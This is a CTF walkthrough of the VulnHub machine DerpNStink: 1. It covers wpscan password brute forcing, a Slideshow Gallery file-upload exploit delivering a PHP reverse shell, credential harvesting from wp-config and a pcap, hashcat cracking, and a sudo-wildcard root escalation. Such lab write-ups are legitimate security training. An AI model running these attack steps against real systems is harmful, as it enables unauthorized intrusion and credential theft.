Mr. Derp and Uncle Stinky are two system administrators who are starting their own company, DerpNStink. Instead of hiring qualified professionals to build up their IT landscape, they decided to hack together their own system which is almost ready to go live…

This box is on the NetSecFocus Admin list of OSCP-like machines. It’s DERPNSTINK: 1 from vulnhub. It’s got a Southpark theme, although it’s not overpowering (which I really appreciate) and I haven’t seen the episode so I don’t get the reference.


This box has FTP, SSH and HTTP on the standard ports (21, 22 and 80).


We have no anonymous access. Moving on…


Robots.txt gives two disallowed entries; /php and /temporary. So we have a hint the server may be running PHP. The /php directory gives a 403, and the /temporary directory suggests we try harder!.

The page source on the webroot refers to /webnotes/info.txt, which says

@stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live

So maybe we have a username. Going back out to webnotes, we get:

[stinky@DeRPnStiNK /var/www/html ]$ whois derpnstink.local Domain Name: derpnstink.local

And some other similar stuff - so we definitely have a user called stinky and a domain called derpnstink.local. I add it to /etc/hosts.


Gobuster on /php turns up phpMyAdmin. So that’s interesting, but we’ll come back to it. We also find weblog in the webroot, which is the blog the earlier comment referred to. It’s running Wordpress, so let’s try wpscan:

root@kali:/opt/vulnhub/derpnstink# wpscan -e --url http://derpnstink.local/weblog

This turns up two users: unclestinky and admin. A password attack:

root@kali:/opt/vulnhub/derpnstink# wpscan --url http://derpnstink.local/weblog -U 'unclestinky,admin' -P /usr/share/seclists/Passwords/probable-v2-top12000.txt

quickly yields admin:admin, but nothing for unclestinky.

Logging in, our ‘admin’ user is not actually an administrator.


wpscan also revealed a plugin - Slideshow Gallery 1.4.6 - which has an arbitrary file upload vulnerability. I mirror the python script from searchsploit and run it:

root@kali:/opt/vulnhub/derpnstink# python -t http://derpnstink.local/weblog -u admin -p admin -f sh33l.php

Where sh33l.php is the pentestmonkey PHP reverse shell. It’s found at


And gives back a shell as www-data.

On the box

Enumeration with linpeas suggests the box probably should be vulnerable to multiple kernel exploits but I try a few quickly and they fail.

It also gives us the credentials for mysql:

[+] Searching Wordpress wp-config.php files
wp-config.php files found:
/var/www/html/weblog/wp-config.phpdefine('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mysql');
define('DB_HOST', 'localhost');

This looks like it is probably a dead end, but we try it in phpMyAdmin and it works. We can grab the hash from the wp-users table:


I crack this in Hashcat on my Windows host machine:

PS C:\Users\David\Downloads\hashcat-5.1.0> .\hashcat64.exe -m 400  .\hash.txt .\rockyou.txt
hashcat (v5.1.0) starting...

Session..........: hashcat
Status...........: Cracked
Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
Hash.Target......: $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
Time.Started.....: Thu Oct 22 21:09:21 2020 (10 secs)
Time.Estimated...: Thu Oct 22 21:09:31 2020 (0 secs)

With this, we can su to the stinky account.


Enumerating stinky we can find an SSH private key:

stinky@DeRPnStiNK:~/ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh$ cat key.txt

And once we copy the contents and chmod 600 we can SSH in as stinky and leave our shell behind.

More enumeration reveals a pcap file; might be interesting?

stinky@DeRPnStiNK:~$ cd Documents/
stinky@DeRPnStiNK:~/Documents$ ls -lash
total 4.2M
4.0K drwxr-xr-x  2 stinky stinky 4.0K Nov 13  2017 .
4.0K drwx------ 12 stinky stinky 4.0K Jan  9  2018 ..
4.2M -rw-r--r--  1 root   root   4.2M Nov 13  2017 derpissues.pcap

Digging through this, we can find a password for the mrderp user:

POST /weblog/wp-admin/user-new.php HTTP/1.1
Host: derpnstink.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://derpnstink.local/weblog/wp-admin/user-new.php
Cookie: wp-saving-post=8-saved; wordpress_ef6a5fe14854bbc5e051bfac8b7603e7=unclestinky%7C1510725219%7CHPwFbs1B7NSefEO05QbhgUwtXobk0hhCbJT33eZsgek%7C6460ba6af109224bf369c32e37c430fd32a9ac320b4d978bc16d8a1f3ca99f9e; wp-settings-time-1=1510552441; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_ef6a5fe14854bbc5e051bfac8b7603e7=unclestinky%7C1510725219%7CHPwFbs1B7NSefEO05QbhgUwtXobk0hhCbJT33eZsgek%7C55f5ff022ece754f6aeb3642679a2074c97bd50b026460691164c8ec509acd34
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 366

action=createuser&_wpnonce_create-user=b250402af6&_wp_http_referer=%2Fweblog%2Fwp-admin%2Fuser-new.php&user_login=mrderp&email=mrderp%40derpnstink.local&first_name=mr&last_name=derp&url=%2Fhome%2Fmrderp&pass1=derpderpderpderpderpderpderp&pass1-text=derpderpderpderpderpderpderp&pass2=derpderpderpderpderpderpderp&pw_weak=on&role=administrator&createuser=Add+New+UserHTTP/1.1 302 Found
Date: Mon, 13 Nov 2017 05:54:58 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Location: users.php?update=add&id=3
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

And with that, we can su as mrderp.


The final privesc to root is perhaps the easiest - binaries in /home/mrderp/binaries/ named derpyNAME can be run as root. We already knew this from a file stored on the server in /support called troubleshooting.txt:

On one particular machine I often need to run sudo commands every now and then. I am fine with entering password on sudo in most of the cases.
However i dont want to specify each command to allow
How can I exclude these commands from password protection to sudo?
Thank you for contacting the Client Support team. This message is to confirm that we have resolved and closed your ticket.
Please contact the Client Support team at if you have any further questions or issues.
Thank you for using our product.

Visting we find this:

mrderp ALL=(ALL) /home/mrderp/binaries/derpy*

Let’s confirm that now:

mrderp@DeRPnStiNK:~$ sudo -l
sudo -l
[sudo] password for mrderp: derpderpderpderpderpderpderp

Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass,

User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*

I haven’t encountered this exact scenario before - let’s try making a copy of bash.

mrderp@DeRPnStiNK:~/binaries$ cp /bin/bash derpybash
cp /bin/bash derpybash
mrderp@DeRPnStiNK:~/binaries$ sudo -u root /home/mrderp/binaries/derpybash
sudo -u root /home/mrderp/binaries/derpybash
root@DeRPnStiNK:~/binaries# whoami

And that was the end of derpnstink. Quite a few steps involved, and it was pretty good - thumbs up Bryan Smith.